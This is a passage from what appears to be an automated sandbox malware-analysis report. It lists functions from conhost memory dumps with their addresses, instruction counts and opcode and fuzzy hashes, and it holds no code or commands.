                                                            Function 00007FFD348D9801 Relevance: .2, Instructions: 245COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348d3000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 620c1a2e124fcfe617b56d27b5dd168e0a4c86ade45b49d0d596635252af5ac9
                                                            • Instruction ID: b45da1d3a4ff929cdca17a67f1580f4a9c8146354ac8ad3ec7ea58ab5646983d
                                                            • Opcode Fuzzy Hash: 620c1a2e124fcfe617b56d27b5dd168e0a4c86ade45b49d0d596635252af5ac9
                                                            • Instruction Fuzzy Hash: 8781D831B1994A4FEB98EB6CC4A46A977E1FF59310F51427AD10DD7292DF38B842CB80
                                                            Function 00007FFD34CA3969 Relevance: .2, Instructions: 244COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 11e056fb4fb5e6d6fc24ea291c655dc23caa95c9ea321e29ba8c4f7168ca7c7b
                                                            • Instruction ID: cb9b82ab8e08f84d338478256f75fb2a07825cb790c0bbaa5b11cf1abb4f1ae3
                                                            • Opcode Fuzzy Hash: 11e056fb4fb5e6d6fc24ea291c655dc23caa95c9ea321e29ba8c4f7168ca7c7b
                                                            • Instruction Fuzzy Hash: C1711331B0E5594FE7E8DA5888B61BC37D0EF46310B1402BADA9EC75B2DE1CAC06D781
                                                            Function 00007FFD34CA6A5A Relevance: .2, Instructions: 240COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6bc1e935d40c780262fb71eafc006ab92e59d1347c0262730b79848f64936427
                                                            • Instruction ID: 294d5495422a39271e0b783ed0879e8f7b4a4481fe63e826039952b5e5e5cb19
                                                            • Opcode Fuzzy Hash: 6bc1e935d40c780262fb71eafc006ab92e59d1347c0262730b79848f64936427
                                                            • Instruction Fuzzy Hash: 7B91B231B095468FEB99CF18C4F56B97BA1FF46300F1445BAC58ACB29ACA3CE845DB41
                                                            Function 00007FFD34CA452B Relevance: .2, Instructions: 233COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd58ca6c2bf74741e4d38e9dee5f345b54a2bd1e46932d3c7bd8a5c83862cd6b
                                                            • Instruction ID: 56c56fdab5e9f562ad002fcce8324a56a058871ddd073d657c97c03404b9ff9f
                                                            • Opcode Fuzzy Hash: dd58ca6c2bf74741e4d38e9dee5f345b54a2bd1e46932d3c7bd8a5c83862cd6b
                                                            • Instruction Fuzzy Hash: FD717D30E1D54A8EEBA5DBA884A56FCBBB1FF4A300F54057AD10ED7191DE2C6841EB44
                                                            Function 00007FFD34CBC8FE Relevance: .2, Instructions: 233COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bd00bfeb508a99df2f8d73854d15f99fc52bc5ad1227eaee8c992aa48322c0cc
                                                            • Instruction ID: 8f70c8ef3d1e5c7b41e8161e9cf47b9bcf0b84ef72d1818a579907da2b689134
                                                            • Opcode Fuzzy Hash: bd00bfeb508a99df2f8d73854d15f99fc52bc5ad1227eaee8c992aa48322c0cc
                                                            • Instruction Fuzzy Hash: 27718230A18A4D8FEBA8DF28D8557ED77E1FB59310F10426EE84DC3291CF78A9558B81
                                                            Function 00007FFD348B08D0 Relevance: .2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f894613d37803008817b22ed7991912e7b096b8a9a7a7e5335e987f54f78a80
                                                            • Instruction ID: e8af7746a5f6e30b409922bfe8daf30a6db57f9d75c036619aaf9550a66331ee
                                                            • Opcode Fuzzy Hash: 1f894613d37803008817b22ed7991912e7b096b8a9a7a7e5335e987f54f78a80
                                                            • Instruction Fuzzy Hash: 5D411422B0C5691FE718B7FCA4FA2FA7B91DF86325B0805BBD54DC7193DD68A84182C4
                                                            Function 00007FFD348B090D Relevance: .1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6d4565032e349053b3e3626addaffc83519187b75bb8e43fcc442b632d6007f6
                                                            • Instruction ID: 913cd9e442067acbd58eb61a065cbc8fcfed879f73678aaaf2eea027680df515
                                                            • Opcode Fuzzy Hash: 6d4565032e349053b3e3626addaffc83519187b75bb8e43fcc442b632d6007f6
                                                            • Instruction Fuzzy Hash: CE411322B0C5691FE718B7FC64AA2F97BD1DF86321B08047AE14DC7193DD68A84282C4
                                                            Function 00007FFD34CA90AB Relevance: .1, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b0b39fdf53382fdc84bf1b3be529c49ef24e56bb919cdfb85d83263b622cce8
                                                            • Instruction ID: 1875c780c9133f07e136661f515e6859df6b173da316f1773dbeb0eae51747e7
                                                            • Opcode Fuzzy Hash: 3b0b39fdf53382fdc84bf1b3be529c49ef24e56bb919cdfb85d83263b622cce8
                                                            • Instruction Fuzzy Hash: 8441A421B598994FFAC8F75884FA6B862D2FB9A314F49057AE50DC32C2DD2CEC419B41
                                                            Function 00007FFD34CA80A7 Relevance: .1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e1765f08d3ad031740002c3bc99a462c0a4ea9d6af17e51fd65627d0b6933ef1
                                                            • Instruction ID: c6ea45aadc60792e826f71c04f1829625bec03924c903fba8156c3cb65b3a988
                                                            • Opcode Fuzzy Hash: e1765f08d3ad031740002c3bc99a462c0a4ea9d6af17e51fd65627d0b6933ef1
                                                            • Instruction Fuzzy Hash: 3841733170C9488FDF98EB18C4A9DA4B3E1FBA9314B14016AD14EC7692DE29F845CB81
                                                            Function 00007FFD34CA3057 Relevance: .1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f5a890933e434c22f11d1339ed5bbfc9a9e807a62b4d6d87ca1ec00e95fcc67
                                                            • Instruction ID: 8e2a25bb7cbf13817590f7a1857c56e19c8f3f54d7a208e03e34b945add2bf18
                                                            • Opcode Fuzzy Hash: 5f5a890933e434c22f11d1339ed5bbfc9a9e807a62b4d6d87ca1ec00e95fcc67
                                                            • Instruction Fuzzy Hash: 3E41523170C9498FDF9CEF58D4A5EA4B7E1FBA9310704056AD54EC3292DE25F845CB81
                                                            Function 00007FFD34CA8151 Relevance: .1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 56b7a61d94bc34ae174d39d2ce28bae1603fd01b53e6bde80a36c6807afe58fd
                                                            • Instruction ID: ee9df2df3c5131c0c3c6fd1db3c4c43c80a3db2dc2ab5a1a4b98de13898de45c
                                                            • Opcode Fuzzy Hash: 56b7a61d94bc34ae174d39d2ce28bae1603fd01b53e6bde80a36c6807afe58fd
                                                            • Instruction Fuzzy Hash: 1131813160C9448FDF9CEF18C4A9DA4B3E1FBA931470505AED04AC7692CE28F885CB81
                                                            Function 00007FFD34CA3101 Relevance: .1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 660d2c7fc5f17281a0adba8e16b635cd8a60dca3ecf8dc3787a2a2aac55044ac
                                                            • Instruction ID: d395c2c2a35c7962287d63c352e016dce701dbdae143f07caab7579a445d9904
                                                            • Opcode Fuzzy Hash: 660d2c7fc5f17281a0adba8e16b635cd8a60dca3ecf8dc3787a2a2aac55044ac
                                                            • Instruction Fuzzy Hash: 3F318F31A0C9498FDB9CEF18C4A5EA4B3E1FBA931070406AED54EC7292DE35F841CB81
                                                            Function 00007FFD34CAD795 Relevance: .1, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f716113a80bacc46cd3ec7191689e84a03185a91a0b9ff58645d172b2018a7d0
                                                            • Instruction ID: ab69825a5906af1d7a751e75a0e5bf4d1722ef43c8de658c6243d3d230d2c70b
                                                            • Opcode Fuzzy Hash: f716113a80bacc46cd3ec7191689e84a03185a91a0b9ff58645d172b2018a7d0
                                                            • Instruction Fuzzy Hash: 8D31D562F1F68646F7E8921858B32BD33C2EB9A351F54057BDA9DC3582EC0C681A52D3
                                                            Function 00007FFD348B0908 Relevance: .1, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction ID: e9a9dbf1134489ff64ed3cba917a8358e1fcd4671c08e58730990ba5daa9f485
                                                            • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction Fuzzy Hash: 7321913130C9184FE768EA1CE88ADB977D1EF9A32171501BAE58AC7126E955EC8287C1
                                                            Function 00007FFD34CA80EB Relevance: .1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4cbf5dfa625fc2a2ec6dce9fd17c76b83aec630d3214558fd246e815ad042261
                                                            • Instruction ID: 979604cd5d12beb9cf0456cdc3aca0155e3b7258fac9a218ad0b229a3e12f417
                                                            • Opcode Fuzzy Hash: 4cbf5dfa625fc2a2ec6dce9fd17c76b83aec630d3214558fd246e815ad042261
                                                            • Instruction Fuzzy Hash: FA316F317089498FDF9CEF18C0A9DA4B3E1FBA9314715056ED04AD7692DE28F885CB81
                                                            Function 00007FFD34CA309B Relevance: .1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7428d20943acbc326b9987cc4b3899221c1c5b9b738773083520cdf894d5f8ce
                                                            • Instruction ID: 457b4321649cbb3932b789e0f9eccb6b2b2267bf5b19e57a233de34ee1643dc5
                                                            • Opcode Fuzzy Hash: 7428d20943acbc326b9987cc4b3899221c1c5b9b738773083520cdf894d5f8ce
                                                            • Instruction Fuzzy Hash: AF313E3560C9498FDB9CEF18C4A5EA4B3E1FBA931070405AED54EC7292DE25F845CB81
                                                            Function 00007FFD34CA52E3 Relevance: .1, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5dcf6d67ad58757a2f8630da14d38af3a49540757725d9f5826c633cafc5b27e
                                                            • Instruction ID: fd5ad5f18a7fadab60ab68026afe444c4324fbebbf056d70de0666ae532f6427
                                                            • Opcode Fuzzy Hash: 5dcf6d67ad58757a2f8630da14d38af3a49540757725d9f5826c633cafc5b27e
                                                            • Instruction Fuzzy Hash: EE31C631B0E9494FDBD8965894A12BC77F1EF8A320F54427ED15EC3687DE2CB8069781
                                                            Function 00007FFD34CA02B0 Relevance: .1, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 017594c0941965c01a9aa64ce4986b800d57665f31e6bb9fc833c87c5b06a3b8
                                                            • Instruction ID: 5c64d07112fe309f6f6eaa75d858ed756b67062cdee9c51197bd4fb807558500
                                                            • Opcode Fuzzy Hash: 017594c0941965c01a9aa64ce4986b800d57665f31e6bb9fc833c87c5b06a3b8
                                                            • Instruction Fuzzy Hash: 1C31C271F0EA4A4FEB989A5994B21BCB7E1FF4A350B14027BD15EC3682CE1C7C029281
                                                            Function 00007FFD34CA7EB5 Relevance: .1, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5ac8299aa536de08a31421d6f4aab9955eab17a892b0b61fe6e947e2eb81a0ee
                                                            • Instruction ID: 23fd90c65d22df484e2b1de55a7fffc24f75ce4cb4ba7c93c23fdbf25f2f709c
                                                            • Opcode Fuzzy Hash: 5ac8299aa536de08a31421d6f4aab9955eab17a892b0b61fe6e947e2eb81a0ee
                                                            • Instruction Fuzzy Hash: 0F31F931A1A94A8FEBA8DB5488A55BD77B1FF46300F50007BD60ED6591DA3CEA40A781
                                                            Function 00007FFD34CA520D Relevance: .1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 665eb4d5b85d551a8c1460e99163b964e8f9a6597373b4423cf64cf44ea420d8
                                                            • Instruction ID: 8cfddaebafeda0ef4d812d0d76016af3754e06cdd8286af871bd2ab72a1b0033
                                                            • Opcode Fuzzy Hash: 665eb4d5b85d551a8c1460e99163b964e8f9a6597373b4423cf64cf44ea420d8
                                                            • Instruction Fuzzy Hash: 01313071B0990A9FDB88DA58D4A15BCB3A2FF99310B54427AD11ED7686CF28B812D780
                                                            Function 00007FFD34CA2E65 Relevance: .1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 825fee3256504b126a26f8ce9e7573e8181064abbb3f1cad44ea53b8d879f982
                                                            • Instruction ID: b069780897923e635c8c2200b37cadb5380bbac67bea89cd5a0df075b0a74c54
                                                            • Opcode Fuzzy Hash: 825fee3256504b126a26f8ce9e7573e8181064abbb3f1cad44ea53b8d879f982
                                                            • Instruction Fuzzy Hash: 10311C30A1E56ACFEBE8DB5488E15BD77B0FF46301F50017BD60ED6281DA3CA9A0A741
                                                            Function 00007FFD348B4525 Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f76199cad91336ed4c6596ea4a5038cd6993799d230880f24c13eebc03ab9bd3
                                                            • Instruction ID: 7576e503df4d863be61114b351e301bd5f2f669ca10a6d89107f0f71a574b2be
                                                            • Opcode Fuzzy Hash: f76199cad91336ed4c6596ea4a5038cd6993799d230880f24c13eebc03ab9bd3
                                                            • Instruction Fuzzy Hash: 4E310120F0C91A4FEB94EB2884B67B86291FF5B740F5041B5D64ED7296DEACAC40A781
                                                            Function 00007FFD34CA1D50 Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9699dd79fb86f1a37b4b014f24025a29234880a5a08460b14553574fa65eeeff
                                                            • Instruction ID: 7a6ee2fe63993b57a3ce0678e030e3d36bf2d6bdb9652c91538593ea643cb2ef
                                                            • Opcode Fuzzy Hash: 9699dd79fb86f1a37b4b014f24025a29234880a5a08460b14553574fa65eeeff
                                                            • Instruction Fuzzy Hash: B931F510A1E5D68BE7AA831454B45B87FA1AF53310B1846FBD18ACF5D7CC1CE885A741
                                                            Function 00007FFD348B116D Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f5cc15ad0868cd368d010f81b00efcc154de48d0fbbd702be5591ca4cba1729f
                                                            • Instruction ID: 678fea2c0fefb15e70ca21e1bc36f3c9ddd77c58ed4631264aa60c56df7d2f92
                                                            • Opcode Fuzzy Hash: f5cc15ad0868cd368d010f81b00efcc154de48d0fbbd702be5591ca4cba1729f
                                                            • Instruction Fuzzy Hash: 4C318631A0C54A8FDB45EB64C8A59B977F0FF5A310F0545BAC00ADB293DE79A945CB80
                                                            Function 00007FFD348B0998 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3044a8aba920feec32626da456ba3123a975b97ed0872969bdb9546009d3d5bc
                                                            • Instruction ID: 15e179914caa0b970752419da9097f64a813821269c106e83331472778680879
                                                            • Opcode Fuzzy Hash: 3044a8aba920feec32626da456ba3123a975b97ed0872969bdb9546009d3d5bc
                                                            • Instruction Fuzzy Hash: 4921F920B5C9690FF798E76C94EA6B976C2EB9A315B500079E50EC33D2DD6CEC4282C1
                                                            Function 00007FFD34CA6DA0 Relevance: .1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 288a68655cadc18bbdb7c57f3c52b8f3249636e1a001738d31ef43aa39eb8403
                                                            • Instruction ID: 102037c007f12b648fe77fbb1848a3f7a111b523707dbde28809c57003f3ee45
                                                            • Opcode Fuzzy Hash: 288a68655cadc18bbdb7c57f3c52b8f3249636e1a001738d31ef43aa39eb8403
                                                            • Instruction Fuzzy Hash: 9A312911B1E5D64BE7AA831884F85BC7BA1EF53310B1845BBD1D6CB1E7C81CB841E391
                                                            Function 00007FFD348D5901 Relevance: .1, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348d3000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e979d0ae87bd775efc2597c3b3a7918f79388fc10d4f6f98969a54b78dd5a05b
                                                            • Instruction ID: 5815cd120ba33bdf9b8be46f5cddf611a2ba0995629f7971322691667f9f9d8f
                                                            • Opcode Fuzzy Hash: e979d0ae87bd775efc2597c3b3a7918f79388fc10d4f6f98969a54b78dd5a05b
                                                            • Instruction Fuzzy Hash: 2D11B122B0F46A1BF7A5D72C68A06B967D1EB97360B1503B7D54EC3186DC1C5C4352C5
                                                            Function 00007FFD348B0C25 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e5f67d1b481ceacd871555a3b275c3256700914c0434335d3c87438a0822dbfd
                                                            • Instruction ID: d096ccad5cc86478fd04227944588ddc4db47be91ce7d6d8977c420fe186064d
                                                            • Opcode Fuzzy Hash: e5f67d1b481ceacd871555a3b275c3256700914c0434335d3c87438a0822dbfd
                                                            • Instruction Fuzzy Hash: 2A21B136B0D6899FE712ABA898B10ED7B60EF43320F1442B2D148DB183EE7C654696C1
                                                            Function 00007FFD34CA41A2 Relevance: .1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e4c37371655825b3763255e72b389a0c5a5ffc6569a9492f092db1e7eb78bb3d
                                                            • Instruction ID: a4b9d4fca19050d1a6d17e4018cfbb7aadb60b582a10bc77b843f391678fb3dd
                                                            • Opcode Fuzzy Hash: e4c37371655825b3763255e72b389a0c5a5ffc6569a9492f092db1e7eb78bb3d
                                                            • Instruction Fuzzy Hash: 4021D575A0991D8FDF98DB58C4A5AECB7B1FF69315F0002AED10EE3291CA35A9818B40
                                                            Function 00007FFD34CA01DB Relevance: .1, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 918b1de45d2f1777bd46c92523c2e2e56895cd11a2c1ec1fe381ef50739ea53f
                                                            • Instruction ID: 980a625e49265c79454fda2fbad2e0f6436f42ae2ac655dc0a08e994e4939727
                                                            • Opcode Fuzzy Hash: 918b1de45d2f1777bd46c92523c2e2e56895cd11a2c1ec1fe381ef50739ea53f
                                                            • Instruction Fuzzy Hash: C9212771B0990A9FDB98EE58D4E25B8B3A2FF59754B14423ED10ED3685CF287C12DB80
                                                            Function 00007FFD34CA3658 Relevance: .1, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2773d1ec85d9e7e2731693bf971805e623c8ea7586487890afec30d3e37df10e
                                                            • Instruction ID: c25f8e1a8e8bdb2331ef00753def5c3f68cd46f5962b0ebaaea6b94b513b5262
                                                            • Opcode Fuzzy Hash: 2773d1ec85d9e7e2731693bf971805e623c8ea7586487890afec30d3e37df10e
